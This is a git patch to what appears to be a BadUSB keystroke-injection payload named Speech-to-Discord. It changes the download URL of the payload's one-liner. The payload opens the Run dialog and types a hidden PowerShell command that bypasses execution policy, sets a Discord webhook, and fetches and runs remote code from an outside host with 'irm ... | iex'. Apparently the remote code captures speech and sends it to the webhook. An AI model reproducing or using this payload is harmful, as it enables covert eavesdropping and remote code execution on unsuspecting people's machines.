From fa17a208389bed590eb366b66b9ae837a2e23a4c Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 17 Jun 2025 11:11:02 +0000 Subject: [PATCH] Update Speech-to-Discord.txt --- Speech-to-Discord/Speech-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Speech-to-Discord/Speech-to-Discord.txt b/Speech-to-Discord/Speech-to-Discord.txt index 6496718..60af27e 100644 --- a/Speech-to-Discord/Speech-to-Discord.txt +++ b/Speech-to-Discord/Speech-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwspeechdc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/dcsp | iex ENTER